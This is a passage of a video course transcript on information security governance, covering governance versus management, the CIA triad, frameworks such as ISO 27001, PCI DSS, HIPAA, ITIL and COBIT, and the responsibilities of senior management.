aligned to tasks, stages, and accordingly you can do the planning. When you get to
the coding stage there are certain tools which are like Confluence, Jira, Git, Eclipse.
In the build stage, you have sbt, Maven, Gradle. In the test stage, you have Se,
JUnit. Finally in the release stage, you have Jenkins, Codeship, Bamboo. At the
deploy stage you will use tools like DC/OS, Docker, AWS, Puppet, SaltStack. At
the operate stage you will use tools like Chef, Ansible, Kubernetes, Mantis. At the
monitor stage you can use applications like Nagios, Splunk, Datadog, Sensu, and
New Relic.
Course Summary
[Video description begins] Topic title: Course Summary. [Video description ends]
So in this course, our goal was to identify the continual infrastructure testing, and
to learn how they play a key role in DevOps development. We did this by covering
concept of continuous security practices. Importance of continuous security, key
components of DevOps, security risks in DevOps, DevOps tools. In our next
course, we will move on to explore the security governance and its importance.
Information Security: Security Governance
In this 9-video course, learners will discover the importance of implementing
security governance in an organization. Explore differences between security
governance and security management, types of governance frameworks, and the
roles of senior management. Also covered are ensuring good IT security
governance, risks and opportunities, security governance programs, and governance
framework structure. Key concepts covered in this course include how to
distinguish between security governance and security management; learning about
different types of IT governance frameworks including ISO 27001, PCI DSS,
HIPAA (Health Insurance Portability and Accountability Act), ITIL, and COBIT;
and learning the various roles and responsibilities of senior management in
governance; learn the measures used to ensure good IT security governance
including creating governance within an organization, delivering governance
through the right stakeholders. Next, observe how to review governance on a
periodic basis; learn the risks and opportunities in security governance and making
sure the security policies are up to date; and examine the process of rolling out a
security governance program. Finally, you will examine the structure of a
governance framework.
Course Overview
[Video description begins] Topic title: Course Overview. Your host for this session
is Ashish Chugh. He is an IT Consultant. [Video description ends]
Hi, my name is Ashish Chugh. I have more than 25 years of experience in IT
infrastructure operations, software development, cybersecurity, and e-learning. In
the past, I've worked under different capacities in the IT industry. I've worked as a
quality assurance team leader, technical specialist, IT operations manager, and
delivery head for software development. Along with this, I've also worked as
cybersecurity consultant. I have a Bachelor's degree in Psychology, and diploma in
System Management. My expertise are IT operations and process management.
I have various certifications which are Certified Network Defender, Certified
Ethical Hacker, Computer Hacking Forensic Investigator. Other than these
certifications, I also have few certifications from Microsoft, which are MCSC,
MCSA, and MCP. I'm also certified Lotus professional. In this course, we will
understand what security governance is. We will also learn about the role of
security governance in the enterprise security. Then, this course will also cover
different types of governance. And one of the critical thing that this course will
cover is the role of senior management in security governance. Later on in the
course, we will also learn about different types of security governance programs,
and the tools and controls to enforce security governance.
Governance and Management Comparison
[Video description begins] Topic title: Governance and Management Comparison.
The presenter is Ashish Chugh. [Video description ends]
Security governance is a method using which an organization directs and controls
IT security within an organization. The fundamental goal of security governance is
to ensure that the security strategies of the organization are aligned with the
business objectives, mission, and vision. And security governance also ensures that
the security strategies are consistent with the regulations, laws, and compliance
programs. There are two roles that the security governance has to play. One, it
defines the accountability framework. Two, it provides an oversight to ensure that
risks are adequately mitigated. Let's now define what security governance is.
Security governance is a subset of the enterprise governance, and it is critical to
your organization. It provides a strategic direction that ensures that the
organization's objectives are achieved, risks are managed properly, and
organizational resources are used responsibly. Security governance has to be
aligned properly with the IT governance, otherwise both of them cannot work.
When you talk about security governance, it consists of some of the key
components, which includes the senior management that is the leadership of the
organization, organizational structure, and its processes. All these things are
required for security governance to be implemented and work properly.
Information security governance is also the responsibility of the board members
and the senior management. Which includes your senior executives like CEO,
CTO, CSO.
The security governance program should be embedded as a part of organization's
overall governance program and integrate. Let's look at how security governance
and CIA triad work together. CIA triad has three key components, confidentiality,
integrity, and availability. When you talk about confidentiality in information
security, it means that information should only be accessible to authorized person,
and kept secret from the unauthorized access, which simply means that it needs to
be available on need to know basis. If you are not entitled to know it, you will not
have access to the information. It is one of the most important goal in the
information security. Then we come to integrity, which implies ensuring accuracy,
reliability, and completeness of information and information systems. It also
prevents them from any kind of unauthorized alteration, modification, or attack.
The third component in the CIA triad is availability. Refers to providing the
authorized individual the legitimate access to the information as and when required.
Availability also ensures that the information is created or stored and can be made
available to the authorized users or systems whenever they need it. So what is the
need for security governance? Why would security governance be put in place in an
organization? So it helps you fulfill the following goals. It helps you bring together
business goals and vision. So for instance, if you have a business goal that does not
align with the security strategy of the organization then both will work in different
directions. So security governance brings them together, and ensures that the
security strategy and the business goal and vision are knitted together, and they
work together. Security governance also brings in lot of best practices. Which
means, if you use a security governance framework, you can use it and implement
in your organization. And the framework will carry the best practices that are
available in the market today. So you do not have to reinvent the wheel and recreate
everything. Which means, you could also end up with some of the bad practices
during implementation. But, if you use a security governance framework, you can
also bring in the best practices. It also helps you bring together the technical
requirements.
Technical requirements in most senses is not understood by the senior
management, or the non-technical people. So security governance helps you bring
that together, and ensures that the technical requirements are understood and
implemented properly. The last but not the least, it also helps you meet the
regulatory and legal requirements. So for instance, if you are into the payment card
industry, then you would use a security governance framework, which will help
you meet the regulatory and the legal requirements, without which you might end
up getting into legal trouble. Therefore, you need something that can help you
bridge that gap. Security governance with the help of a security governance
framework can bridge that gap. Let's now look at the outcomes of the security
governance. So first of all, you have the strategic alignment.
Security governance help you align information security with the organizational
objectives. Then comes the resource management. It helps you use the
organizational resources more effectively and efficiently. Then comes the value
delivery. It helps you optimize the security cost and investments. That means that
you do not unnecessarily go and buy lot of security hardware and software, which
do not add value to the existing network architecture. So security governance keeps
a watch over it and helps you ensure that you optimize the security costs. Then
comes the business process assurance, which helps you integrate all relevant
assurance processes to maximize the effectiveness and efficiency of security
activities. After that, then comes the performance management, which is used for
defining, reporting, and using information security governance metrics. It also
helps you in monitoring and reporting on security processes to ensure that the
business objectives are achieved. Then you have another outcome, which is risk
management. Which helps you identify, manage, and mitigate risks. Only looks at,
how do I mitigate risk?
[Video description begins] Security Governance and Security Management. [Video
description ends]
What security control should I put in place to mitigate that particular risk?
[Video description begins] The Security Management takes a decision of "How to
mitigate risks?". [Video description ends]
Security governance, on the other hand, decides who's authorize to take a decision.
So, it could be your Chief Information Security Officer, who is authorize to decide,
"How do I mitigate that risk?" Now about security controls. Security management
only looks after the implementation of security controls. Their job is to ensure
security controls are appropriately placed and implemented so that the risks are
mitigated. Security governance, on the other hand, does not worry about the
implementation of security controls. They are only worried about whether the risks
are mitigated or not. Then comes the security strategies. Security management only
suggests or recommends certain suggestions about the security strategies. Security
governance, on the other hand, has a very key role to play in the security strategy. It
ensures that it is aligned with the business objectives.
As far as policies are concerned, security management only enforces the policies.
Security governance ensures that the policies are enforced. Now, the mode in which
security management works is responsibility. It is their responsibility to ensure
risks are mitigated. On the other hand, security governance has the accountability.
Which means that they are accountable to ensure that the risks are mitigated. There
are few more fundamental differences between security governance and security
management.
[Video description begins] Security Governance and Security Management. [Video
description ends]
When you talk about planning, security management only works at the project
level. Security governance, on the other hand, works at the strategy level. So they
have to ensure that the security strategy meets the business goals and the visions.
As far as resources are concerned, security management does the allocation of the
resources. So for instance, who's going to do what? But, security governance
ensures that there is a proper utilization of the resources. So that is what their
responsibility is. Now when you come to the business vision, security management
has the responsibility to implement policies that align with the business vision.
Security governance, on the other hand, takes the business vision and translates into
the policies, which are then implemented by the security management team. So
what are the fundamental elements of security governance?
[Video description begins] Security Governance Elements. [Video description
ends]
There are three core elements. The first one is governance principle. These are the
principle by which all IT initiatives are governed. Second one is governance
structure. This includes the roles and responsibility of the major stakeholders in the
IT governance decision-making process. And it includes committees and
organizational elements at the branch level. Third one is governance process, which
reviews, assesses, and approves, or rejects any new IT initiatives. Let's now look at
the importance of security governance. The first importance is alignment and
responsiveness. Security governance ensures security strategy is align to the
business objective and mission. And it also helps you in objective decision-making
rather than taking some ad hoc decisions. Security governance helps you come up
with objective-based decisioning, so that, you can make the right decision. It also
helps you in organizational risk management because you put in appropriate
processes in place and those processes are being monitored on a regular basis.
Therefore, there is a proper channel that gets created. And you are able to, defining
the risks to mitigating them, becomes part of the organizational risk management
program. It also helps you in execution and enforcement. So not only you are able
to execute the policies, implement them with the security management team, but
you are also able to enforce them. That is what you have to do, you have to ensure
that the policies are enforced properly.
Now, there is a team that becomes accountable for the security governance. And
this is typically the top leadership that is accountable for the security governance
program. Let's now look at some of the benefits of the security governance
program. So you have increased market value. If you go by with one of the security
governance frameworks and adopt it, customer will have a better trust. And
therefore, you can generate more business. Organizations that have a security
compliance framework implemented, they are likely to get more business from the
market. Therefore, they increase their market value. This is because if you take an
example of yourself, would you want to buy something which is unbranded? Which
does not have any stamp on the product that says that, "This is quality checked and
quality approved." No, you would not want to buy that product. What says, you
would go and buy a product, which has a quality check and ensures that the quality
of the product is appropriate and it is good.
Similarly, lot of organizations get business because they showcase their security
compliance program. Maybe it could be something like, PCI DSS or it could be
ISO 27001. It depends, or it's an internal security compliance that they have done.
So more security they have implemented, better aligned they are with security
compliance, more business they are likely to generate. It also lowers the security
risks, because in the security governance, you have already deployed the risk
management program. You are already defining what the risks are, you are able to
categorize your assets, you know what assets to protect. Therefore, the risks are
lower in comparison to an organization, which does not follow this process. You
have protection from legal liabilities, because let's take an example of PCI DSS. If
you are in the credit card industry, and if you do not comply to PCI DSS standard,
then you're in for legal liabilities. But, if you adopt that program, and you have
been successfully compliant against PCI DSS, then there are chances that there are
going to be no legal liabilities. So the risks are reduced to bare minimum or
acceptable level. Now assume that you do not comply with the...now, if a hacker
steals your data, which is a customer data, your organization can be in a big risk.
Which means a customer can actually put a lawsuit against your organization.
Another benefit is reduced operational cost because security governance helps you
in resource management and performance management. Therefore, you lower your
operational cost.
There are predictable outcomes, and you know what risk can cause what kind of
damage, so you are well prepared for that. So you save all the cost of not rerepeating the same tasks again and again. But, you can optimize your resources and
the things that they need to do to be able to save the operational costs. You also
have better accountability as a benefit. Now, different individuals have different
responsibilities within an organization. So you can assign different set of
responsibilities to the individuals to safeguard the information. For instance, think
of an organization that does not have security governance implemented. Now for a
user, safeguarding the information is responsibility of either the IT team, or the
security team, user does not take any responsibility. With the security governance
in place, user is made aware that he or she is responsible for the information that
they are handling. So therefore, each individual has a certain set of responsibilities
to safeguard the information.
Types of IT Governance Frameworks
[Video description begins] Topic title: Types of IT Governance Frameworks. The
presenter is Ashish Chugh. [Video description ends]
There are different types of IT governance frameworks that are available. It is
important to know that not all IT governance frameworks will fit every
organization. Depending on the nature of work that your organization does, you
will have to adopt the appropriate IT governance framework. Going forward, we
will look at some of the key IT governance frameworks that are available today. To
start with there is ISO 27001. Then comes the PCI DSS, then HIPAA, ITIL, and
COBIT. An organization need not implement all these IT governance frameworks.
For instance, an organization, which does the credit card processing work will need
to only adopt PCI DSS. Going forward, we'll be looking at each one of these IT
governance frameworks in detail. ISO 27001 helps you define an Information
Security Management System, which is known as ISMS, to bring information
security under management control. It helps you maintain a balance between
physical, procedural, technical, and personnel security.
[Video description begins] ISO 27001. [Video description ends]
There are controls that are defined in ISO 27001 that serve as a guideline, that cater
to different controls such as technical, logical, and physical. For instance, for
example, a few controls in ISO 27001 focus on physical security, whereas the other
controls help you in the technical implementation. ISO 27001 contains 114 controls
in 14 clauses and 35 control categories. ISO 27001 helps you reduce and control IT
risks. What you have to understand is implementation of ISO 27001 is not one-time
activity. You first start with establishing, implementing, maintaining, and finally
move into the continual improvement phase. Therefore, because you are
continuously looking at your IT infrastructure and the risks and security controls
that you've implemented, so it lowers the IT risks. Because you're in the continuous
improvement phase, it also helps you reduce the chances of security breaches.
Remember, your business is not going to be static. It will evolve. And therefore the
security controls that you have implemented to prevent security breaches, they will
also have to evolve along with the business. Now if you do that, with the
continuous improvement program in the ISO 27001, you will reduce the chances of
security breaches. This is because your security controls are always updated.
You always find out what are the security risks and control them with appropriate
security controls. Therefore, the chances of security breaches reduce. And, because
you are able to reduce the number of security breaches, you are able to retain the
information confidentiality. ISO 27001 also helps you lower the cost by reducing
the chances of threat, as well as aligning IT with the business processes and
strategic decisions. Now, because everything is aligned with business processes and
strategic decisioning, then there are less chances that you're going to end up
spending more money. Because since, there are less number of threats, there are
less effort that you've to put in. You define a method to systematically detect
vulnerabilities. As part of the ISO 27001, you will do vulnerability assessment.
You will ensure that those vulnerabilities are closed, and they're properly mitigated
to prevent any kind of threat from happening. It also provides a method to meet the
compliance requirements. You implement risk management, which will help you
ensure legal and regulatory compliance. Because you have already implemented
risk management, the number of risks have been identified, number of critical
assets have been identified. Therefore, there is more closeness to the legal and
regulatory compliances. It follows the PDCA method, which is plan, do, check, act.
Now in ISO 27001, 2013 version, PDCA is not explicitly mentioned. It was there in
version 2005, but it is still used as the underlying method.
Now, let's understand what PCI DSS means. It's an acronym for Payment Card
Industry Data Security Standard. Now, when you talk about that are developed and
adopted by the payment card industry. This is done to protect the credit card
information. Any online merchant and service provider who process, store, transmit
credit card information need to comply with PCI DSS guideline. If they do not do
that, they are liable to face penalties. Now, there could be different type of
merchants. It could be a merchant doing 1 million transactions in a month, it could
be a merchant doing 10,000 transactions in a month.
[Video description begins] The PDCA stands for Plan, Do, Check, Act. [Video
description ends]
So there are different levels of PCI DSS that you need to comply with. So going
forward, we will look at the types of merchant levels that need to comply
themselves with the PCI DSS standard.
[Video description begins] PCI. [Video description ends]
PCI DSS applies four different merchant levels. Depending on the number of
transactions you perform, you need to be compliant with PCI DSS at a specific
level. Now, these four different levels that we are talking about were defined by
Visa. It is pretty clear about the four different types. So it starts with any merchant
who does less than 20,000 transaction in a year. Then the second level is any
merchant who does between 20,000 to 1 million transactions in a year. Third level
is, any merchant who does between 1 to 6 million transactions in a year.
[Video description begins] Types of Merchant Levels. [Video description ends]
And the fourth level, which is the top most level is "Any merchant who does more
than 6 million transactions in a year based on the number of transaction that you do
in a year, you need to be compliant to a specific level in PCI DSS." Next, we will
now look at HIPAA compliance framework. HIPAA stands for Health Insurance
Portability and Accountability Act of 1996. The HIPAA compliance framework is
mainly applicable in United States of America. HIPAA framework defines the
security requirements for any kind of electronic transmission of patient data. It
helps to outline the policies that help to ensure data privacy and implement security
processes for protecting medical information. When you talk about HIPAA
compliance framework, it provides detailed requirements for privacy and security
of data. So it tells you that patient information is very sensitive and it needs to be
protected. So, you will have to ensure that the HIPAA compliance framework gives
you guidelines "How do you protect the privacy and the security of the patient
data?" Because there are different types of patient information involved, which
could be in the form of written document, verbal communication, voicemail,
database, audio, video, and images. All these type of information needs to be
protected and this can be protected with three different types of security controls.
One is administrative, second is physical, and third is technical. HIPPA requires
you to make use of these three different types of security controls to protect the
information.
There are three different entities who are involved in HIPAA. So, one is the
consumer. Consumer is the patient. The patient information is stored with the
providers, which could be in the form of electronic or non-electronic form. Now,
HIPAA requires the providers to safeguard this information at any cost. Then, you
have HIPAA for regulators, which is the main federal agency responsible for
informing, and protecting the public about health information privacy rights. Then
we come to the ITIL compliance framework, which is an acronym for Information
Technology Infrastructure Library. Now when you talk about ITIL, it is the IT
infrastructure library that defines the best practices for IT services management.
Now, there is no specific reason, why an organization cannot implement ITIL. Any
organization that wants to improve IT services, can adopt this compliance
framework and implement within the organization. ITIL defines a framework for
incident management process. Now, why would it want to define a framework for
Incident Management?
[Video description begins] HIPPA. [Video description ends]
Because, according to ITIL incident should be handled through a structured
process. They need to be handled through a structured process to ensure efficiency
and best results. If you do not have a incident management process implemented,
the users and the IT team within the organization does not know what to do with
the incident. Now, when you have implemented the incident management process
through the ITIL compliance framework, you should be able to handle the incident
through a structured process with more efficiency and with a better results. ITIL
also helps the organization to use IT service and management, which is ITSM
practices and this helps them align their IT services with the business function
because there are set processes that you have to follow. Now, if you do not follow
that process, you have not actually implemented ITIL, you need to be able to
follow these practices.
[Video description begins] The abbreviation of IT Service management is
ITSM. [Video description ends]
Going forward, we will look at some of the processes and the procedures that ITIL
brings into the picture. Now, this is the ITIL framework. In this, then there are
different processes and functions.
[Video description begins] ITIL Frameworks. An ITIL framework is displayed. It
contains five steps that are Service Strategy, Service Design, Service Transition,
Service Operations, and Continual Service Improvement. The Service Strategy step
contains four process that are called Financial Management, Service portfolio
Management, Demand Management, and Strategy operations. The Service Design
step contains Service level Management, Availability Management, Capacity
Management, Continuity Management, Information Security Management, Service
Catalogue Management, and Supplier Management. The Service transition step
contains Change Management, Asset and Configuration Management, Release and
Deployment Management, Transition Planning and Management, Service
Validation Management, Evaluation, and Knowledge Management. The Service
Operations step contains Service Desk, Incident Management, Problem
Management, Access Management, Event Management, Request Management,
Technical Management, Application Management, and IT operation Management.
The Continual Service Improvement contains 7 Step Progress Improvement. [Video
description ends]
Anything that is in the dark shade is considered a function. So for instance service
desk. Service desk is a function. What is the role of service desk? For example, a
user's desktop is not working. What does the user do? Calls up the service desk.
Which is actually a help desk, which helps you log the ticket for that particular
desktop. So an engineer comes, he repairs the desktop for the user, and the
complaint is resolved. So, now this particular incident or the ticket logged in the
service desk is considered to be resolved. Then there are other functions, which is
technical management, which looks after the servers and various other things.
Application management, which is more to do with application deployment and
managing them. IT operation management, which is the complete IT operations
that run. So it could involved right from managing the service desks to
implementing new applications, implementing new servers. Then, the other part is
the processes. There are different processes that run within the organization. It
could be financial management, it could be demand management, strategy
operations, which are run by the top management. Then how do these, “function
together” is what, ITIL framework defines. So, you take an example of supplier
management.
What happens when somebody supplies a set of material to your organization?
How does that function? How does the security come into the picture? Let's assume
a supplier supplies a set of desktops to your organization. So how does the supplier
management and security function together to ensure that deliveries are appropriate
and the assets that have been received from the supplier can be safeguarded?
Similarly, now, if you look at the Change Management Process under service
transition, if you do not have ITIL framework implemented and you need to deploy
or make configuration changes to a critical server and the organization, you would
just simply go ahead and do it. You do not know what will be the outcome of that
change. However, when you have the Change Management Process, there is a
Change Approval Board, which is known as CAB, is put in place. They review
every change that you are planning to do. They approve or reject the change. You
have to make sure that you test what you want to implement, and show them the
results. So, they can approve or reject your change. So, there is a particular process
that gets implemented. Every change made to the IT infrastructure in the
organization is recorded. So, similarly there are other processes, which function
like asset and configuration management, how the assets are tracked, and their
service history. What role do they play in the configuration management? So ITIL
framework in totality defines all this.
The next one is COBIT, which stands for Control Objectives for Information and
Related Technologies. Now, COBIT is a framework, which works on five different
principles, meeting stakeholder needs, covering the enterprise end to end, applying
a single integrated framework, enabling a holistic approach. Since, it separates
governance and management, it is used both for IT governance and management.
So, using a single framework you can also do IT management and implement IT
governance. It is also used by organization in different types of industries. So, there
is no fixed industry in which COBIT can be used. It is not only the IT industry,
COBIT can be used across different industries, be it automotive, be it
manufacturing, or be it medical industry. It also focuses on the following of the
information system, it looks after the quality, it looks after the control and
reliability. With the help of the COBIT, ensures quality, control, and reliability of
the information system in an organization, because it does the IT management and
IT governance. Therefore, all three critical components, which are quality, control,
and reliability, are strictly monitored and governed under COBIT. Let's now look at
the four domains of COBIT and we will also do a comparison with ITIL.
COBIT has four domains. The first one is plan and organize, which uses the
information and technology to drive best results for the business goals and
objectives. It also focuses on the organizational and infrastructural form of IT to
drive best results. The second domain is deliver and support, which focuses on the
delivery of information and technology. It focuses on the effective delivery of IT
within the organization. We then move to the third domain, which is acquire and
implement. This domain identifies IT requirements and also focuses on acquiring,
and implementing technology for the business. This domain also develops a
maintenance plan, to keep the IT infrastructure going. Finally, the fourth domain
which is monitor and evaluate, focuses on this strategy, that will assess whether the
current IT infrastructure, meets the business requirements or not. It also covers the
monitoring aspect of the IT performance. Let's now look at how COBIT differs
from ITIL. Even though, it is quite similar to ITIL, but it is much broader in scope.
The reason is, ITIL focuses on it processes, whereas COBIT, on the other hand
focuses on controls and metrics. This is the reason, COBIT answers "Why" and
ITIL answers "How." COBIT is mainly audit-driven, whereas ITIL is mainly
service level-driven. ITIL focuses on mapping, IT service levels. On the other hand,
COBIT focuses on mapping, IT processes.
Senior Management Roles and Responsibilities
[Video description begins] Topic title: Senior Management Roles and
Responsibilities. The presenter is Ashish Chugh. [Video description ends]
Let's now look at management problems in the context of security governance. First
of all, the management does not pay attention to security, which means the board of
directors or generally the board, does not get involved into these strategic IS
decisioning, which is information security decisioning. And does not delegate this
responsibility to anybody who's qualified to handle this. Also, the board of
directors, or the board, does not have any kind of updates on the state of the
information security, its adequacy, or its effectiveness or the control measures in
place. Therefore, it cannot evaluate the added value of security for the business.
Then, we move on to implementation of security in silos, which means the security
of an organization and its infrastructure is the responsibility of a single department.
And this responsibility is not shared with any other department in the organization.
Then, there are minimal security controls in place. Because there is no
measurement on the effectiveness of the existing security controls, sometimes the
security team places only the required controls, which they think are sufficient.
Therefore, it is a problem with the implementation of only a few controls. This also
leads to another point that the defense in depth might be missing in most
organizations.
The management also does not pay attention to the security, for them, business
comes first. The security is the responsibility of the security department. Most
often, businesses consider the chief information security officer or chief
information officer to be responsible for the security. Which is not the correct thing
to do, because it is not only a single team that can drive the security initiative.
Funds for security are not available, that is because in most cases security is
considered to be an overhead. Very often you would see the security team trying to
convince the senior management to buy more security hardware or the software.
But most often, they are unsuccessful, because the management does not see the
necessity of spending that money on the security hardware. This leads back to the
first point, because there is a very little attention to the security. Management is
also unaware of risks and measures. This is because the business initiatives and
projects are not assessed for thier compliance with the security strategies. This
means that they are not assessed for new security risks.
[Video description begins] Management Problem. [Video description ends]
This largely happens because security team is working in a silo, and they are not
connected with the other departments. And therefore, the new upcoming projects
are not assessed for security risks. And since they are not assessed, the management
does not have any know about of the new risks and what measures need to be put in
place to counter these risks. A business may end up changing several processes
over a period of time. Now, as and when new business processes are introduced,
new security risks are born, and they are likely to be present in the organization.
However, because none of these business processes are assessed, therefore the risks
are unknown. Because the risks are unknown, the existing security posture does not
solve the business problem. This is because the management does not provide
sufficient funds. Two, the management does not pay attention to the security of the
infrastructure, and for them, it is not a business problem. Then we come to the
return of investment. Since the management is not involved into the security
infrastructure and it's decisioning or its security strategy, therefore, the security
team is unable to justify the return of investment to the management.
Previously, we had discussed management decides how security has to be
implemented. On the other hand, governance decides who's responsible. And if
there is no governance in place, the accountability for data privacy protection is not
defined. It is only left to the security team to protect the data privacy, which in
most organization happens. And it is not the correct way to do it, because it is not
the security team's problem to protect the data privacy. Let's now look at how
security governance becomes a management responsibility. First of all, security
governance is not owned by the users, it is everybody's responsibility. We start
from the top and we go down to the bottom of the organization, which is the last
employee in the organization. Everybody must be involved in the security
processes. And there would be some stakeholders, who would be typically the end
users, need to adhere to the security processes.
[Video description begins] Security Governance As Management
Responsibility. [Video description ends]
Security governance also requires management commitment. If management is not
involved, it is not security governance. Because those are the people sitting on the
top who would decide the security strategies. They are the ones who have to
designate an individual or a team of individuals who will manage the security.
Therefore, it needs a management commitment to be successful. Security is most
often looked at as a technical problem, which is not the correct way of looking at it.
It is a management problem. When the management is involved, when the
decisioning happens right at the top of the organization, then it becomes a
management problem. And why it becomes a management problem? Because the
security directly implements the business processes. If there is no adequate
security, then there are chances that more and more risks are going to be introduced
within the organization. And since these risks are present, there are chances of the
organization's data being at risk. Since the management is involved, the attention
from the leaders need to be present for the security governance. This is because
these people will sit down and decide the security strategy. They will also help to
take decisions, and they will decide how the security needs to be aligned with the
business processes. Remember, security cannot run in a silo like in most
organization it does. Unless or until it is properly aligned with the business
processes, it cannot protect the business.
Let's now look at some of the senior management roles. So you have board of
directors, you have executives, steering committee, and you have chief information
security officer. Remember, every organization will have different set of senior
management roles. Therefore, it is not necessary that everybody will have the board
of directors, executive, steering committee, and chief information security officer.
Just to give you an example, if it is a medium sized organization instead of having a
chief information security officer, they might have chief information officer taking
up the role of chief information security officer. So board of directors is the
topmost position, where set of individuals will decide the security strategies. And it
is passed on to the executives, steering committee, and chief information security
officer will help implement the security strategy across the business.
[Video description begins] The abbreviation of Chief Information Security Officer
is CISO. [Video description ends]
Let's now look at some of the senior management responsibilities. First of all, at the
top, which is the board of directors and the chief information security officers,
steering committee, and the executives. These guys come up with a security
strategy, which helps in developing and providing strategic direction. The security
strategy has a set of defined objectives. They also ensure that these objectives are
met. And how they are met is depending on the implementation of the security
strategy. Now, security strategy also helps to come up with the risks and define
them. What these risks are, what is the criticality of this risks, and how can they be
mitigated? Finally, the senior management also has to ensure there is a proper
resource utilization. This could be in terms of the man power it could be in terms of
the infrastructure that is available. So they ensure that the proper resource
utilization is taking place. Let's now look at four essential practices for the board.
First of all, they ensure that security is one of the key agenda in their portfolio. So,
if it is not there, then of course the governance is not present in the organization. So
security becomes one of the key agendas that the board has to look after. And this
is again not looked at as a technical problem, but the management problem. And
the board takes the strategic decisioning and ensures that security is implemented
and driven in a proper fashion. They also ensure that a leader is identified who is
accountable for the security.
In most cases, this would be chief information security officer. Then a security
policy is not only define, but it is reviewed for effectiveness from time to time.
Because your business processes may change, you will get new projects, the old
projects will get over and therefore, there would be chances that you will have to
revise your security policy. Because the existing security policy may not cater to
the new projects or the new business processes that are in place. And therefore, it is
essential that the security policy is reviewed for effectiveness and changed from
time to time, if required. The committee is also responsible to ensure that
information security is aligned with the business processes and is implemented in a
proper manner. Let's now look at the paradigm shift, how security was looked at in
the past and how it is being looked at now. If you talk about the overall objective in
the past, the only objective was IT security. And it was driven only by the security
team. In the current scenario, most organizations are now moving the overall
objective to business continuity. Which means, if there is a disaster that happens,
which could be in any form, a flood, earthquake, malware attack, or a hacking
attempt that has happened on the organization, and servers are down, so there is
some problem with the IT infrastructure.
The business continuity has to come into the picture. Which means they should be
able to revive their infrastructure in next few hours and get the business up and
running. Initially, the defined scope was technical and now the defined scope is
business. Which means the management is involved and security is being looked at
as a business problem, not the technical problem. In the past, IT team or the
security team was the owner of the security, now it is the business that is the owner
of the security. They do the strategic decisioning, they come up with a plan, they
know what to implement. Of course, IT or the security team plays a key role in the
implementation. But the management is the one that knows the return on
investment on the security. In the past, funds were always a problem as far as IT
costs were concerned, everything in the IT infrastructure was looked at as expense.
Now, because management is playing a key role, it is being looked at as an
investment. Consider an example. If somebody steals your confidential information
and sells it to competitor, your business stands nowhere in that context.
Now, this you cannot consider IT infrastructure was a cost. If you would have put
enough measurements or enough security controls in place in the initial stage, you
would have prevented this from happening. So this is an investment, you are
investing into IT infrastructure and putting security controls in place to safeguard
your data. Initially, management used to get involved once in a while. It was an ad
hoc involvement. Now there is a continuous, and ongoing, and integrated
involvement from the management. The simple reason is security is no longer an IT
problem, it is a business problem. As far as approach method is concerned, in the
past, it was a practice-based method, which means that you had to do something
and get security in place. There was no process that were attached to it. Now,
organizations have started to shift from practice-based to process-based, which
means everything is aligned to a specific process. It was earlier managed by IT
teams, now security is being managed by the business leaders.
Ensuring Good IT Security Governance
[Video description begins] Topic title: Ensuring Good IT Security Governance. The
presenter is Ashish Chugh. [Video description ends]
How do you ensure good IT security governance? So there are basically three steps
that you have to follow. First, you have to create governance within the
organization. Second, you have to deliver governance through the right
stakeholders. Third, you have to review the governance on periodic basis just to
ensure that everything is working as it is expected to. Let's now look at creating the
governance. So first of all, you need to have an information security policy defined,
and it must be aligned to the business requirements. Going back to the discussions
that we had earlier, security policy cannot work in a silo. It must be aligned to the
business requirement, and it must always be updated to cater to the business
requirements and the processes. The governance must be a top-down from the
board level, which is the C-level to the last employee of the organization.
Remember, it cannot be the last employee who's driving the governance, it has to
drill down from the top level to the last employee. This is because if the
management is involved, the employees are likely to adopt the approach much
faster than security team trying to enforce it. A risk management approach must be
developed and implemented, and it should be oversighting the corporate security
policy that is align to business requirements and processes. This is to ensure that
the existing or the new risks that are being introduced into the environment are
being mitigated. There must also be a corporate IT security authority should be
appointed, preferably with a different reporting chain than those responsible for IT
operations.
This person should be watching over the security operations. The person should
also have clear role and responsibilities defined. You should also have an IT
security authority to watch over the security operations. This is required because
somebody needs to lead from the front and ensure that security operations are wellaligned with the business operations and they are catering to the business processes.
Moving on, there should be clear roles and responsibility defined for the
individuals in the security team. You should also appoint an IT security authority,
preferably who has a different reporting chain than those responsible for IT
operations.
This person needs to have clear role and responsibilities defined. You should also
establish an internal audit and review authority with the direct line of
communication to the board. IT security policy must be reviewed along with the IT
security posture on the regular basis. And if there are changes required as per the
business processes or the business operations, both of them, which are IT security
posture, as well as IT security policy, need to change. Let's now look at how to
deliver governance. First of all, you need to identify the assets. Assets not only
need to be identified, they need to be categorized, they need to be categorized
according to their criticality. So for instance, one server may not be as critical as
the domain controller. So therefore, you need to identify the asset, assign a
criticality level, and also associate the risk levels attached to the asset. You should
also identify the risks and threats for each critical asset. Once you have defined the
assets, you have defined their criticality level, now you need to move ahead and
identify the risks and threats that may be applicable to that particular asset.
Remember, it is not necessary, a same risk might be applicable for all the critical
assets, there could be a possibility, but it is not necessary. Similarly, different types
of threats would be applicable to different types of critical assets. Once you have
done that, then you need to implement the security controls and their procedures.
This is required because unless or until you have identified the risk and threats, you
should not implement security controls. This is what had been happening in the
past where security controls were generalized and they were implemented. Now,
they need to be implemented as per the risks and the security threats. Everybody
who's participating in the security operations, they must have roles and
responsibilities defined. So for instance, chief information security officer will have
different set of roles and responsibility than the IT security administrator. So
everybody needs to have a clear cut role defined, everybody needs to have clear cut
responsibility defined. If that is not done, then accountability cannot happen later
on, if there is an incident that takes place. Moving on, you should also conduct
audits and reviews regularly, this is going to be required.
[Video description begins] Review Governance. [Video description ends]
Because if audits and reviews do not happen, you do not know whether the security
controls are still effective or not. Audits can happen at a designated interval, so can
the reviews. Both of these are necessary for you to understand if the security
controls are adequate in the existing security posture. They may be, they may not
be, but the outcome of the audits and the review will decide that. Once you have
done the audits and the reviews, based on the outcome, you may have to adjust the
security control and the security posture accordingly. And if that is not done, then
you are still living with the risks. The audit and the reviews will also find the risks
and the threats that are applicable to certain type of assets. So once you have
identified those, you need to ensure that these risks are properly mitigated. And you
need to mitigate these risks in alignment of the business strategy and the business
operations. Going back to the previous discussion, remember security must be
aligned with the business processes, and therefore any risk that you're mitigating
must be dealt with keeping business goals in mind. It should not happen that you
have mitigated one risk, but it has introduced a few more new risks in the
organization that can impact the business processes.
Let's now look at the signs of good security governance. First of all, everyone in the
organization must be involved. This is because the security governance has to start
from the top, which is the board, and it goes down to the last user. Everyone knows
the importance of security and complies with it. Then board must be involved in
security related decision-making, which means that they are not isolated. They are
not only paying attention to the business, but they also understand the importance
of security and are involved in security related decisions. The organization must
also define security strategy and the security policies, because both of these form
